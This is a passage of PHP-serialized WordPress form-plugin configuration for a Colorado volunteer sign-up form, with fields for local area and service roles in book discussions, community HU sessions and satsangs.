Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Boulder\";s:5:\"value\";s:7:\"Boulder\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:10:\"Co Springs\";s:5:\"value\";s:10:\"Co Springs\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Denver\";s:5:\"value\";s:6:\"Denver\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Loveland\";s:5:\"value\";s:8:\"Loveland\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Western Slope\";s:5:\"value\";s:13:\"Western Slope\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_225\";s:15:\"container_class\";s:14:\"one-half first\";s:11:\"field_label\";s:15:\"Your Local Area\";s:9:\"field_key\";s:14:\"listselect_225\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:262;}i:6;a:2:{s:8:\"settings\";a:16:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:7;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_226\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_226\";}s:2:\"id\";i:263;}i:7;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:8;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:21:\"Service Opportunities\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:275:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:275:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Service Opportunities</span></span></span></strong></span></h3>\r\n<span style=\"color: #800000;\">HINT: Hold down the CTRL key to make multiple selections</span>\";s:3:\"key\";s:8:\"html_227\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:21:\"Service Opportunities\";s:9:\"field_key\";s:8:\"html_227\";}s:2:\"id\";i:264;}i:8;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:16:\"Book Discussions\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"3\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:30:\"Trained Arahata with prior exp\";s:5:\"value\";s:30:\"Trained Arahata with prior exp\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Trained Assistant Arahata\";s:5:\"value\";s:25:\"Trained Assistant Arahata\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:16:\"Attendee Support\";s:5:\"value\";s:16:\"Attendee Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_228\";s:15:\"container_class\";s:17:\" one-third first \";s:11:\"field_label\";s:16:\"Book Discussions\";s:9:\"field_key\";s:19:\"listmultiselect_228\";}s:2:\"id\";i:265;}i:9;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:12:\"Community HU\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"3\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Food Services\";s:5:\"value\";s:13:\"Food Services\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:7:\"Greeter\";s:5:\"value\";s:7:\"Greeter\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"Host\";s:5:\"value\";s:4:\"Host\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:19:\"listmultiselect_232\";s:15:\"container_class\";s:10:\" one-third\";s:11:\"field_label\";s:12:\"Community HU\";s:9:\"field_key\";s:19:\"listmultiselect_232\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:266;}i:10;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:15:\"listmultiselect\";s:5:\"label\";s:8:\"Satsangs\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:9:\"list_type\";s:5:\"multi\";s:10:\"multi_size\";s:1:\"3\";s:15:\"list_show_value\";s:1:\"1\";s:4:\"list\";a:0:{}s:21:\"user_info_field_group\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:10:\"user_state\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"options\";a:3:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Attendees Support\";s:5:\"value\";s:17:\"Attendees Support\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> 